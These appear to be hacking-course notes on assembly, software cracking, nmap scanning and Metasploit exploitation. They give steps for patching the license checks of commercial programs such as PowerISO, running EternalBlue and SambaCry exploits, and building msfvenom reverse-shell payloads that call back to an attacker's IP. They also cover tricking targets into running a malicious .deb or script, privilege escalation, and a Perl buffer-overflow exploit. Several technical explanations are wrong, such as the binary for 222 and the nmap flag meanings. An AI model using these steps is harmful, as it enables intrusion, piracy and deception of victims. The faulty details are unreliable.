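    for (unsigned long v = 0; v <= 15; v++) {    /* reproduces the table above */
        to_base(v, 2, b, sizeof b);
        to_base(v, 8, o, sizeof o);
        to_base(v, 16, h, sizeof h);
        printf("%2lu   %-5s %-4s %s\n", v, b, o, h);
    }
    printf("126 = %s\n", byte_bits(126, bits));   /* 01111110 */
    printf("192 = %s\n", byte_bits(192, bits));   /* 11000000 */
    return 0;
}
```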





Computer Programming Languages
==============================
1. High Level Language
2. Low Level Language
3. Mid Level Language

1. High Level Language
======================
 Written and understood by humans. These programming languages use English words and mathematical expressions; that is why they are understandable to humans.
 C, C++, Java, Python, Ruby

2. Low Level Language
=====================
 It is a language which is only understandable to machines or computers. It contains 0 and 1 --> Binary Language
 222 ---> 101010

3. Mid Level Language
=====================
 Languages which convert a high level language to a low level language.
 They use registers and hex values as the location.
 We can retrieve mid level language from low level language.
 Eg. Assembly Language

High Level ----> Mid Level Language ---> Low Level Language
C programming example:
.c --> .o --> exe

Assembly Language
=================
 It uses registers and memory locations in hexadecimal for storing the content, or its reference, of another programming language.

8085 processor

Registers
=========
1. General Purpose Registers
2. Special Purpose Registers
3. Segment Registers

1. General Purpose Registers
============================
 Are used to store any transient data ---> temporary data.
 Registers which are required by the program:
 AX
 BX
 CX
 DX
 They are the combination of two 8-bit registers:
 Low Byte
 High Byte
 AX ---> AL AH
 16 bit --> 8 bit 8 bit
 AX = 1234h
 AL --> 34
 AH --> 12
 Low Byte | High Byte
 ====================
 AL       | AH
 BL       | BH
 CL       | CH
 DL       | DH


Extended form of the Register
-----------------------------
 EAX
 EBX
 ECX
 EDX

 EAX - 32 bit register


2. Special Purpose Registers
============================
 Data Structures:
 Array
 Union
 Structure
 Heap
 Stack

 They store the data in the form of a stack.
 1. SP - Stack Pointer - It points at the top of the stack.
 2. BP - Base Pointer - It points at the base of the stack.
 3. IP - Instruction Pointer - It points at the address of the next instruction.
 4. SI - Source Index Pointer
 5. DI - Destination Index Pointer

3. Segment Registers
====================
 CS - Code Segment
 DS - Data Segment
 ES - Extra Segment
 SS - Stack Segment

Other registers (Reference)
===========================
1. Memory Address Register (MAR):
 This register holds the address of the memory location where the CPU wants to read or write data. When the CPU wants to store some data in memory or read data from memory, it places the address of the required memory location in the MAR.
2. Memory Buffer Register (MBR):
 This register holds the contents of data or instructions read from, or written to, memory. The contents of an instruction placed in this register are transferred to the Instruction Register, while data contents are transferred to the accumulator or I/O register. In other words, this register stores data/instructions coming from the memory or going to the memory.
3. Program Counter (PC):
 The Program Counter register is also known as the Instruction Pointer register. It stores the address of the next instruction to be fetched for execution. When the instruction is fetched, the value of IP is incremented. Thus this register always holds the address of the next instruction to be fetched.
4. Flag Register:
 The flag register is used to indicate the occurrence of a certain condition during an operation of the CPU. It is a special purpose register with a size of one byte or two bytes. Each bit of the flag register constitutes a flag (or alarm), such that the bit value indicates whether a specified condition was encountered while executing an instruction.

Assembly Language Basics
========================
 1. ADD
 Eg. ADD EAX, EBX
 EAX = EAX + EBX // Let's assume EBX is 45C02E3
 ADD EAX, 45C02E3
 EAX = EAX + 45C02E3
 2. MUL
 3. SUB
 4. DIV
 5. PUSH - Enters data into the data structure (the stack).
 6. POP - Deletes the top-most data from the stack.

Conditional Branching
=====================
 1. CMP - Compare the memory address of registers
 2. JMP - Jump - Jump to a certain memory address
 3. JZ - Jump if zero - Jump to a certain memory location if the result is zero
 4. JNZ - Jump if not zero - Jump if the result is non-zero
 5. JE - Jump if equal - Jump if the data is equal to the data in the accumulator
 6. JNE - Jump if not equal - Jump if the data is not equal to the data in the accumulator
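A small C model tying the register section (EAX/AX/AL/AH, the instruction pointer, the flag register) to the ADD, CMP and JZ instructions just listed. It is an added example, not real assembly and not from the notes: the struct, the helper names and the two constructed addresses are mine. It shows why the AX = 1234h split gives AL = 34 and AH = 12, how ADD wraps in a 32-bit register, and how CMP only sets the zero flag so that the following JZ decides where EIP goes next.

```c
#include <stdio.h>
#include <stdint.h>

/* Added example: a toy register file. Names follow the notes; ZF is the zero flag bit
 * of the flag register, EIP the instruction pointer. */
typedef struct {
    uint32_t eax, ebx;
    int      zf;    /* zero flag: set when the last CMP result was zero */
    uint32_t eip;   /* address of the next instruction */
} cpu_t;

/* AX is the low 16 bits of EAX; AL is its low byte and AH its high byte. */
uint16_t get_ax(const cpu_t *c) { return (uint16_t)(c->eax & 0xFFFF); }
uint8_t  get_al(const cpu_t *c) { return (uint8_t)(c->eax & 0xFF); }
uint8_t  get_ah(const cpu_t *c) { return (uint8_t)((c->eax >> 8) & 0xFF); }

/* ADD EAX, imm: EAX = EAX + imm. uint32_t arithmetic wraps exactly like the register does. */
void add_eax(cpu_t *c, uint32_t imm) { c->eax += imm; }

/* CMP a, b: computes a - b, discards the result and keeps only the flags (here just ZF). */
void cmp(cpu_t *c, uint32_t a, uint32_t b) { c->zf = ((a - b) == 0); }

/* JZ target: if ZF is set, EIP becomes target; otherwise EIP falls through to next.
 * Returns the new EIP. JE behaves the same way because CMP sets ZF on equality. */
uint32_t jz(cpu_t *c, uint32_t target, uint32_t next)
{
    c->eip = c->zf ? target : next;
    return c->eip;
}

/* CMP followed by JZ as an equality test. Returns 1 when control reaches `equal_addr`. */
int branches_on_equal(uint32_t a, uint32_t b)
{
    const uint32_t equal_addr = 0x00401000u;   /* constructed addresses, not from any binary */
    const uint32_t next_addr  = 0x00401005u;
    cpu_t c = {0};
    cmp(&c, a, b);
    return jz(&c, equal_addr, next_addr) == equal_addr;
}

int main(void)
{
    cpu_t c = {0};
    c.eax = 0x1234;
    printf("EAX=%08X AX=%04X AL=%02X AH=%02X\n", c.eax, get_ax(&c), get_al(&c), get_ah(&c));
    add_eax(&c, 0x45C02E3);                    /* the ADD EAX, 45C02E3 line from the notes */
    printf("after ADD: EAX=%08X\n", c.eax);
    printf("CMP 7,7 ; JZ taken: %d\n", branches_on_equal(7, 7));
    printf("CMP 7,9 ; JZ taken: %d\n", branches_on_equal(7, 9));
    return 0;
}
```

Read the last two lines of output against the JZ/JNZ entries above: the same CMP result drives both, and JNZ would simply take the opposite branch.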

Application Patching
====================
 There are some applications which are very badly coded and can be cracked, and there are many bugs inside those applications. We use application patching for fixing these bugs.
 We then do not need to enter any CD keys, serial number, or any sort of registry keys for getting the license and full-fledged version of the application.

Debugger Tools :

 Windows OS - OllyDBG
 Immunity Debugger
 x64 Debugger
 Linux - GDB - Pre-installed in every Linux based OS - GNU Debugger

OllyDBG
=======
 It is a GUI based tool which is used in application patching and for reverse engineering as well.
 1. Address Column
 2. Reference Column
 3. Instruction Column
 4. String Column

--------------------------------------------------------------------------------------------------



 SESSION 4
 =========

REVERSE ENGINEERING
===================

Engineering : To manufacture a product.
= Forward Engineering
= Reverse Engineering

Forward Engineering
===================
To use raw material and make a fully working product.
 Engineer a car :
 Tyre
 Engine
 Seats

Reverse Engineering
===================
 We got the car; we will dismantle it and get the juicy stuff out of it.
 Software and products:
 CD keys
 Registration IDs
 To convert demo software into fully working software

Eg.

Install games in the computer ----> Copy ---> crack|patch and paste it where the game is installed ---> Patching

Reverse Engineering via Algorithm Reversing
===========================================
 We are going to make some changes in the application's algorithm and make it work as we want it to.
 It shows: Please enter the serial keys for making it a full version.


Olly Debugger : http://www.ollydbg.de/download.htm

Walkthrough :
We enter something
The error message comes
- We will search in the algorithm
- Make the algorithm jump

1. Custom Based Application : Small application in the C programming language
2. BPK Keylogger Detector
3. PowerISO

Requirements
============
1. Debugger - OllyDBG, Immunity Debugger
 http://www.immunityinc.com/products/debugger/
 Linux - GDB
2. OS : Windows 7 Ultimate, XP (any service pack)
3. Vulnerable applications


1. Custom Based Application Cracking
====================================


#include <stdio.h>
#include <stdlib.h>
#include <conio.h>   /* Windows-only header: provides getch() */
int main()
{
    int key, inp;
    key = 112233;                               /* the hard-coded registration key */
    printf("Please Enter the CD-KEY for continue = ");
    scanf("%d",&inp);                           /* read the key typed by the user */
    if(key == inp)                              /* the single comparison the walkthrough below looks for */
    {
        printf("Successfully Registered, You can continue with the full version\n");
    }
    else
    {
        printf("Invalid Key\n");
    }
    getch();                                    /* wait for a keypress so the console window stays open */
    return 0;
}

C to exe converter : http://www.onlinecompiler.net/


Convert this into .exe via online converters.
-----------------------------------------------------------------------------

Steps to Reverse Engineer :

004012E8 |. C70424 2C30400>MOV DWORD PTR SS:[ESP],reee.0040302C ; |ASCII "Successfully Registered....
You can continue with the full version
"

JMP 004012E8


2. BPK Keylogger Detector
=========================

Download Link : https://www.sendspace.com/file/722rb6
 https://ufile.io/q9xgl


---------------------------
Registration error
---------------------------
Registration code or user name is invalid. Please check all fields and try again!
---------------------------
OK
---------------------------

Success Message
004049A5 |. 68 504B4900 PUSH antispy.00494B50 ; |Text = "Registration succeeded. Thank you for choosing Keylogger Detector!"

Copy the address

JMP 004049A5

------------------------------------------------------------------------------------


3. PowerISO
===========
 Download Link : https://www.filehorse.com/download-poweriso-32/

---------------------------
PowerISO
---------------------------
The username or serial number is invalid.
---------------------------
OK
---------------------------


Success Message

00467D3F . 68 84066A00 PUSH PowerISO.006A0684 ; UNICODE "Thank you for your registration."

JMP 00467D3F



 SESSION 5
 =========
(Not available as of now)



 SESSION 6
 =========

NSA : Network Security Analysis
===============================
Information Gathering
Scanning

 To identify the network, the number of PCs/devices connected to the network, the services running on the devices and much more.

 It is something like information gathering on the network.

 For the PT part we need to know the services; for the hacking part we need to know which ports are open and which services are running on those open ports. I need to have the IP addresses of all the devices which are connected to the network.

Necessary information which is required in the Network Security Analysis part:
 IP Addresses
 MAC Addresses
 Ports opened
 Services running over those ports
 Version of the running services
 Operating System
 Operating System Family
 Operating System Version

Two Types of Information Gathering
 1. Normal Information Gathering
 2. Advanced/Intelligent Information Gathering

Normal Information Gathering
----------------------------
 - How many IP addresses are up in the network
 - What are the MAC addresses
 - Vendor name of the MAC/NIC
 - HOSTNAME

 Netdiscover - tool used for normal information gathering

netdiscover -i eth0 -r 192.168.0.1/24

 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor
 -----------------------------------------------------------------------------
 192.168.0.215   24:31:84:77:70:e9    06      360  Lenovo Pvt Ltd
 192.168.0.186   00:50:56:be:7e:1f    02      120  VMWare, Inc.
 192.168.0.167   1c:66:6d:8c:ec:10    27     1620  Unknown vendor
 192.168.0.116   00:24:d7:d1:2f:54    05      300  Intel Corporation
 192.168.0.1     90:6c:ac:e6:eb:bc    15      900  Unknown vendor
 192.168.0.14    00:0c:29:ec:6c:7f    01      060  VMware, Inc.




Advanced/Intelligent Information Gathering
-----------------------------------------
We will receive all the information which is necessary and is a must for hacking into the system:

 - IP Addresses
 - MAC Addresses
 - PORT NUMBER
 - Statistics of Ports
 - Open | Closed | Filtered
 - Services running over those ports
 - Version of the running services
 - Operating System
 - Operating System Service Pack
 - Operating System Family
 - Operating System Version
 - OS BUILD NUMBER
 - SERVICES
 - FIREWALL / WAF / IDS / IPS / UTM
 - VULNERABILITIES
 - CVE
 - CVSS
 - Enumeration of Data



Tools in Action -

NMAP
ZENMAP (GUI Nmap)

NMAP
====
Nmap ("Network Mapper") is an open source tool for network exploration
 and security auditing. It was designed to rapidly scan large networks,
 although it works fine against single hosts. Nmap uses raw IP packets
 in novel ways to determine what hosts are available on the network,
 what services (application name and version) those hosts are offering,
 what operating systems (and OS versions) they are running, what type of
 packet filters/firewalls are in use, and dozens of other
 characteristics. While Nmap is commonly used for security audits, many
 systems and network administrators find it useful for routine tasks
 such as network inventory, managing service upgrade schedules, and
 monitoring host or service uptime.

 The output from Nmap is a list of scanned targets, with supplemental
 information on each depending on the options used. Key among that
 information is the "interesting ports table". That table lists the
 port number and protocol, service name, and state. The state is either
 open, filtered, closed, or unfiltered. Open means that an application
 on the target machine is listening for connections/packets on that
 port. Filtered means that a firewall, filter, or other network
 obstacle is blocking the port so that Nmap cannot tell whether it is
 open or closed. Closed ports have no application listening on them,
 though they could open up at any time.

6 main packets (TCP flags)
 1. ACK --> Acknowledgement
 2. SYN --> Synchronization
 3. FIN --> Finish
 4. RST --> Reset
 5. PSH --> Push
 6. URG --> Urgent
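How the six flags and the open/closed/filtered states fit together, as an added example (not from the notes or from the Nmap documentation): the flags live in one byte of the TCP header, and a SYN scan (the -sS option used in the commands below) classifies a port purely from the flags of the reply to its SYN probe, or from the absence of a reply. The bit values are the ones defined for the TCP header; the function names and the three sample replies in main are constructed by me. For a defender the same decoding is what an IDS applies when it counts bare SYN probes from one source across many ports.

```c
#include <stdio.h>
#include <string.h>

/* Bit positions of the six flags in the TCP header flags byte. */
enum {
    TCP_FIN = 0x01, TCP_SYN = 0x02, TCP_RST = 0x04,
    TCP_PSH = 0x08, TCP_ACK = 0x10, TCP_URG = 0x20
};

/* Render a flags byte as text such as "SYN,ACK"; "none" when no flag is set.
 * out must hold at least 5 bytes. Returns out. */
char *tcp_flags_str(unsigned char flags, char *out, size_t len)
{
    static const struct { unsigned char bit; const char *name; } table[] = {
        { TCP_SYN, "SYN" }, { TCP_ACK, "ACK" }, { TCP_FIN, "FIN" },
        { TCP_RST, "RST" }, { TCP_PSH, "PSH" }, { TCP_URG, "URG" },
    };
    out[0] = '\0';
    for (size_t i = 0; i < sizeof table / sizeof table[0]; i++) {
        if (flags & table[i].bit) {
            if (out[0] != '\0')
                strncat(out, ",", len - strlen(out) - 1);
            strncat(out, table[i].name, len - strlen(out) - 1);
        }
    }
    if (out[0] == '\0')
        snprintf(out, len, "none");
    return out;
}

/* What a SYN scan concludes from the reply to one SYN probe:
 *   SYN+ACK  -> "open"     (something is listening; the scanner then sends RST instead of finishing the handshake)
 *   RST      -> "closed"   (the host answered, but nothing listens there)
 *   no reply -> "filtered" (a firewall or filter dropped the probe, so open vs closed is unknown) */
const char *syn_scan_state(int got_reply, unsigned char reply_flags)
{
    if (!got_reply)
        return "filtered";
    if ((reply_flags & (TCP_SYN | TCP_ACK)) == (TCP_SYN | TCP_ACK))
        return "open";
    if (reply_flags & TCP_RST)
        return "closed";
    return "unknown";
}

/* A segment with SYN and nothing else is a connection start. One is normal traffic;
 * many from a single source to many ports in a short time is the scan pattern a detector counts. */
int is_bare_syn(unsigned char flags)
{
    return flags == TCP_SYN;
}

int main(void)
{
    /* Constructed replies to a SYN probe on three ports (not captured traffic). */
    struct { int port; int got_reply; unsigned char flags; } replies[] = {
        { 445, 1, TCP_SYN | TCP_ACK },   /* listener answered */
        { 139, 1, TCP_RST | TCP_ACK },   /* host refused */
        { 135, 0, 0 },                   /* silence */
    };
    char text[32];
    for (size_t i = 0; i < sizeof replies / sizeof replies[0]; i++)
        printf("port %d: reply flags %-8s -> %s\n", replies[i].port,
               tcp_flags_str(replies[i].flags, text, sizeof text),
               syn_scan_state(replies[i].got_reply, replies[i].flags));
    printf("probe flags %s bare SYN: %d\n",
           tcp_flags_str(TCP_SYN, text, sizeof text), is_bare_syn(TCP_SYN));
    return 0;
}
```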

NMAP - Network Mapper
=====================

1. To scan the whole network
 nmap 192.168.0.1-255      (Target/Router's IP)

2. To scan for services
 nmap -sS <Target IP>

 (-sS - SYN Stealth Scan)

3. For checking the version of the running service
 nmap -sS -sV <Target IP>

 (-sV - Verbose - For maximum output like versions)

4. Brief description of the target machine
 nmap -sS -sC -sV <Target IP>

 -sS (TCP SYN Scan) - Service Detection
 -sV - Verbose - For maximum output like versions
 -sC

5. If I just want to scan for the operating system version
 nmap -O <Target IP>

 (-O : OS Detection Scan)
 Focuses on OS details more.

6. For checking the status of the firewall
 nmap -f <Target IP>
 OR
 nmap -sA <Target IP>

 (-f - Firewall Detection | -sA - TCP ACK scan)

7. Aggressive Scan
 nmap -A -T4 <Target IP>

 -A : Aggressive Script , -T4 - Consecutively 4 packets sent.

8. Port Scan
 nmap -p 0-65535 <Target IP>       // Range
 OR
 nmap -p135,139,445 <Target IP>    // Specific ports

9. Vulnerability Scan for CVE and CVSS
 nmap --script vuln <Target IP>

 (--script vuln : Provided by the National Vulnerability Database)

10. Scanning Subnets
 nmap 192.168.0.1/24      (Target/Router's IP)

11. Firewall Bypass Scan - Ping Probe Scan
 nmap -Pn -p135,139,445 -sSVC <Target's IP>

 (-Pn - Ping Not Script - Which will not send ICMP traffic)

12. Fast Scan
 nmap -F -sSVC <Target's IP>

 (-F - For Fast Scan)

13. UDP Scan
 nmap -sU <Target's IP>

 (-sU for UDP)

For more : Reference - https://nmap.org/book/man.html
 https://nmap.org/book/



 SESSION 7
 =========

METASPLOIT FRAMEWORK
====================
 Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Most researchers use this tool for exploiting devices, machines, databases and servers.
 This tool is a product of the Rapid7 community.
 The Metasploit Framework we use is a trial version|limited version.


 MODULES CONTAINED :

 Payloads
 Exploits
 Auxiliary
 Encoders
 NOPS
 Post


Terminologies
=============
1. Vulnerabilities
2. Exploit
3. Payload
4. Backdoor
5. Covering Traces

Terms
=====
RHOST : Remote Host - Target's IP address which we have to attack.
RPORT : Remote Port - The port number of the target machine on which a vulnerable service is running.
LHOST : Listening Host - Attacker's IP address on which they are listening for the reverse connection.
LPORT : Listening Port - The port number on which the attacker is listening for the reverse connection.


CONSOLE BASED EXPLOIT - 1
=========================
Requirements :
= XP Service Pack 0 and Service Pack 1
= Kali Linux
= Metasploit Framework

KALI : https://www.exploit-db.com/exploits/66/

DCOM (Distributed Component Object Model) is a protocol that enables software components to communicate directly over a network; by default it runs in Win XP SP0-SP1 and Win Server 2000.

Steps:
======
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
 search dcom
5. use <path of the above exploit>
6. show info - information about the exploit
7. show options - to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit


CONSOLE BASED EXPLOIT - 2
=========================
Requirements :
= XP Service Pack 2
= Kali Linux ---> Updates
= Metasploit Framework

Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win XP SP2 is vulnerable and allows a remote attacker to get remote access to the machine.

LINK : https://www.exploit-db.com/exploits/40279/

Steps:
======
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
 search ms08-067/netapi
5. use <path of the above exploit>
6. show info --> information about the exploit
7. show options --> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit


KiMi Framework
==============
It is a framework for exploiting Linux based OS. It is named after a character from Naruto, Kimimaro. In this framework we create a malicious file with the .deb extension (Debian package). We ask the target to install that Debian package; as soon as the target installs it, we receive a meterpreter session.
We need to download this framework from GitHub:
https://github.com/ChaitanyaHaritash/kimi


STEPS :
=======
Copy the link
Open the Linux terminal and type
#git clone https://github.com/ChaitanyaHaritash/kimi.git
#cd kimi
#python kimi.py -h    (help page)


https://www.offensive-security.com/metasploit-unleashed/



 SESSION 8
 =========

On April 14, 2017, the Shadow Brokers group released the FUZZBUNCH framework, an exploitation toolkit for Microsoft Windows. The toolkit was allegedly written by the Equation Group, a highly sophisticated threat actor suspected of being tied to the United States National Security Agency (NSA). This document lists five exploits from the Lost in Translation leak, namely Eternal Blue, Eternal Red, Eternal Synergy, Eternal Romance and Eternal Champion. These five exploits target the Server Message Block (SMB) in Windows and Linux operating systems. I tested and compiled different scripts and modules to find the best and most stable methods to run these five exploits.

Eternal Series :

Eternal Blue : Windows 7 x64 SP1, Windows 8/8.1 Pro
Eternal Red : Kali Linux 2016.2 with vulnerable SAMBA server
Eternal Romance : Windows Server 2016, Windows 8.1 Pro, Windows 10 Build 10240
Eternal Synergy : Windows Server 2012
Eternal Champion : Windows XP SP3


-------------------


 Console Based Exploitation 3
 Windows 7 - Eternal Blue
 Samba Cry - Eternal Red
 Application Based Exploitation
 Payload Based Exploitation
 Post Exploitation - Local Privilege Escalation / Shell to Meterpreter
 GUI Based Exploitation - Armitage

Console Based Exploitation 3
----------------------------
 Eternal Blue --> NSA exploit leaked by Shadow Brokers
 EternalBlue-DoublePulsar
 dll --> Dynamic Link Library file
 DoublePulsar creates a malicious .dll file and Eternal Blue executes that malicious .dll file in the target system.
 Shadow Brokers - Fuzzbunch.py
 Empire Framework - MSF of NSA


SMB
===
Server Message Block operates as an application-layer network protocol mainly used for providing shared access to files, printers and serial ports, and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.


Eternal Exploitation :

Steps
=====
Open a terminal
1. #arp-scan --local
 Target IP Address --> 192.168.228.138
2. #nmap 192.168.228.138
3. #nmap -sS -sC -sV 192.168.228.138
4. #nmap 192.168.228.138 --script vuln
 CVE-2017-0143
Open another terminal, start the Metasploit Framework
5. #msfconsole
6. #search CVE-2017-0143
7. #use auxiliary/scanner/smb/smb_ms17_010
8. #options
9. #set rhosts 192.168.228.138
10. #options
11. #run
 Host is vulnerable to the exploit
12. #use exploit/windows/smb/ms17_010_eternalblue
13. #show options
14. #set rhost 192.168.228.138
15. #options
16. #exploit
 C:/Windows/System32> --> I got access to the command prompt
For changing the payload
 set payload windows/meterpreter/reverse_tcp

Samba Cry - Eternal Red
=======================
 Is the vulnerability for Linux based OS. SMBv2.
 NSA exploit leaked by Shadow Brokers.
Open a terminal
1. #arp-scan --local
 Target IP Address --> 192.168.228.151
2. #nmap 192.168.228.151
3. #nmap -sS -sC -sV 192.168.228.151
4. #nmap 192.168.228.151 --script vuln
Open another terminal, start the Metasploit Framework
5. #search is_known_pipename
6. #search cve-2017-7494
 exploit/linux/samba/is_known_pipename
7. #use exploit/linux/samba/is_known_pipename
8. #info
9. #options
10. #set rhost 192.168.228.151
11. #run
 Will give me a raw shell --> Bash shell

Application Based Exploitation
==============================
Open the terminal, start with msfconsole
1. #msfconsole
2. #search payload/windows/meterpreter
 payload/windows/meterpreter/reverse_tcp --> use
 payload/windows/meterpreter_reverse_tcp
 payload/windows/meterpreter/reverse_http
 payload/windows/meterpreter_reverse_tcp

Open another terminal for creating a payload - stub
3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/payload.exe

 -p - selecting the payload
 windows/meterpreter/reverse_tcp - is the payload
 lhost - attacker's IP address
 lport - attacker's listening port
 -f - file format
 exe - executable file
 > - destination of the output
 /root/Desktop/payload.exe - is the output file

Go back to the first terminal, exploit, set the listening server
4. #use exploit/multi/handler
5. #show options
6. #set payload windows/meterpreter/reverse_tcp
7. #show options
8. #set lport 8989
9. #set lhost Attacker's IP
10. #exploit

Armitage - GUI Based Exploitation
Graphical version of the Metasploit Framework



Post Exploitation - Local Privilege Escalation
----------------------------------------------
DCCP Double Free --> Download it from exploit-db
 41458.c
 Get access to the system.
 Open a terminal in your Kali Linux.
 #cd Downloads
 #gcc 41458.c -o shell
 For compiling the local privilege escalation file
 In the terminal in which the meterpreter session is opened
 #cd /
 #cd /tmp
 #upload /root/Downloads/shell
 #shell
 #whoami
 #ls -la
 #chmod 777 shell
 #./shell
 It will give you root access
 #whoami
 root

-----------------------------------

MSF> use shell_to_meterpreter


--------------------------------------------------------------------------------------------------



 SESSION 9
 =========

MSFVENOM : Creates payloads and binds the encoding function into them.
Msfpayload and Msfencode were merged in 2015 into one single functionality known as MSFVENOM.

We use msfvenom outside the msfconsole platform, because msfconsole only provides listening for the reverse connection via exploits.


1. Application based Payload : Windows (.exe)

Microsoft Operating System ---> exe ---> file.exe ---> executable


msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe

 > which we will make executable

2. Python Based Exploit for Unix/Linux Systems

msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py

Dependencies :
Transfer pyth.py to the target machine.
Ask the target to make it executable by typing
chmod 777 pyth.py

3. Bash Based Payload for Linux/Unix

msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh

Transfer lmao.sh to the target machine.
Ask the target to make it executable by typing
chmod 777 lmao.sh

4. Perl Based Payload for Linux/Unix (runs perfectly on Mac)

msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl

Transfer troll.pl to the target machine.
Ask the target to make it executable by typing
chmod 777 troll.pl

5. Creating a PHP Shell for Servers

msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php

6. Exploit Android/Smartphones using Metasploit over TCP

msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk

7. Exploit Android/Smartphones using Metasploit over HTTPS

msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk

FOR ALL THESE, USE THE METASPLOIT FRAMEWORK LISTENER TO LISTEN FOR THE REVERSE CONNECTION :

> Open MSF = msfconsole
> Use Exploit = use exploit/multi/handler (A wildcard exploit which can be used for listening to the reverse connection.)
> msfconsole
 use exploit/multi/handler
 set payload PAYLOADNAME
 show options
 set lport PORTADDRESSFORLISTENING
 set lhost IPADDRESSFORLISTENING
 show options
 exploit


-----------------------------------------------------------------------

After Meterpreter,

meterpreter> ? (Show Options)
meterpreter> Use Commands

-----------------------------------------------------------------------
Mitigations :
Android :
- SAFE by Lucideus
- Unhack by Lucideus (available on apkpure.com)
- MOBSF (Mobile Security Framework)

Windows :
- Sysinternals Suite

Mac :
- https://lucideustech.blogspot.com/2018/01/handsoff-ultimate-firewall-for-your-mac.html


CTF List
- SwlitoShell1
- Bulldog
- Dina CTF
- Mr. Robot
- BtrSysv2.1
- Tr0ll 1
- Acid Reloaded
- Stapler
- SqliTo Shell2
- Gormint CTF

--------------------------------------------------------------------------------------------------


4636

 SESSION 10
 ==========

BoF PART 1
==========

DATA STRUCTURES
===============
1. STACK > LIFO (last in, first out; function frames and saved return addresses live here)
2. HEAP
3. LINKED LIST
4. ARRAYS
5. STRUCTURES

Data Variables
1. int : Integer
2. char : Character (1 byte)
3. float : Single-precision floating point (decimal values)
4. double : Double-precision floating point (wider range and more digits than float)

Buffer overflow
===============
A buffer overflow is the situation that arises when you write more data into a buffer (here a fixed-size array) than it can hold and nothing checks the length. The copy keeps going past the end of the array and overwrites whatever happens to be stored next to it in memory.

On the stack, "whatever is next" includes the saved return address of the current function. EIP (the instruction pointer) is not itself stored in memory, but when the function reaches its ret instruction the CPU pops the saved return address off the stack into EIP. So if you overwrite that saved value, you control where execution continues after the function returns, and you can redirect the program to code of your choosing (here, the exploit() function).

Requirements:
 Windows 7
 Debugging application - OllyDbg | Immunity Debugger
 Vulnerable application (below)
 A C compiler for Windows

Vulnerable Application Code
---------------------------
#include<stdio.h>
#include<string.h>

int overflow(char *s)
{
 char buffer[10]; //our 10-byte buffer
 strcpy(buffer,s); //vulnerable: no length check, copies until the terminating NUL
 return 0;
}
void exploit() //payload: should never run
{
 printf("Payload executed......\n");
}
int main(int argc, char *argv[]) //input comes from the command line
{
 int a = 0;
 if(argc < 2)
 {
  printf("usage: %s <input>\n", argv[0]);
  return 1;
 }
 printf("So far so good......\n"); //main body
 overflow(argv[1]);
 if(a == 1)
 {
  exploit(); //unreachable in normal flow: a is always 0
 }
 else
 {
  printf("Buffer overflow did not fire....\n");
 }
 return 0;
}


---------------------------------------------------------------

Compile the program ----> we get a .exe file. (name.exe below stands for whatever you called the binary; the instructor's OllyDbg session shows the module as akku, and the Perl script at the end calls it Lovely.exe.)

Normal run:
cmd --> name.exe sdklvns

Long input (far more than the 10 bytes the buffer holds):
cmd --> name.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
error
----> view problem details
 Exception Offset: 41414141
0x41 is 'A': the saved return address was overwritten with our input and the CPU tried to execute at 0x41414141.

Start OllyDbg
-------------
Open name.exe
Follow the program flow and find the instruction where exploit() is called:

00401316 |. E8 94FFFFFF CALL akku.004012AF

The CALL sits at 00401316 and its target, 004012AF, is exploit(). Returning to 00401316 executes that CALL, so 00401316 is the value we want in EIP. (These addresses come from the instructor's build; after recompiling, read them from your own debugger.)

Convert it into little-endian form ---> reverse the order of the byte pairs
 00401316
 00 40 13 16
 16 13 40 00

Now we know the value to put in EIP. Next we need the offset: how many bytes of our input come before the saved return address. To find it, send a long string in which no 4-byte sequence repeats, read the value that ends up in EIP at the crash, and locate those 4 bytes in the string. The notes use an online hash tool for this (a long hex digest is a convenient non-repeating string; Metasploit's pattern_create.rb / pattern_offset.rb do the same job):
http://www.fileformat.info/tool/hash.htm

The hash of the text "16 13 40 00" is

1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba

Run name.exe with that string as the argument:
 Exception Offset: 35376239

Convert it into little-endian form, then into ASCII (http://www.dolcevie.com/js/converter.html converts hex to ASCII):

 35376239
 35 37 62 39
 39 62 37 35  --> ASCII "9b75"

Find "9b75" in the string and count the characters before it:

 1e66186a8e7f4a61ebaae3f46ae2 9b75 20970ee1d605a28b...

There are 28 bytes before it, so 28 bytes of junk are copied before the saved return address is reached. Bytes 29-32 of the input become the new EIP.

Perl Exploit Code :

#!/usr/bin/perl
my $junkdata ="\x41"x28; #28 bytes of junk: fills the buffer and the rest of the frame
my $ret="\x16\x13\x40\x00"; #00401316 in little-endian: the address where exploit() is called
my $exploit=$junkdata.$ret; # combining the two
print "Sending Exploit......\n\n";
system("Lovely.exe",$exploit); # list form of system(): $exploit is passed as argv[1]
print "\n Done with akku..... Buffer OverFlow Successful\n";
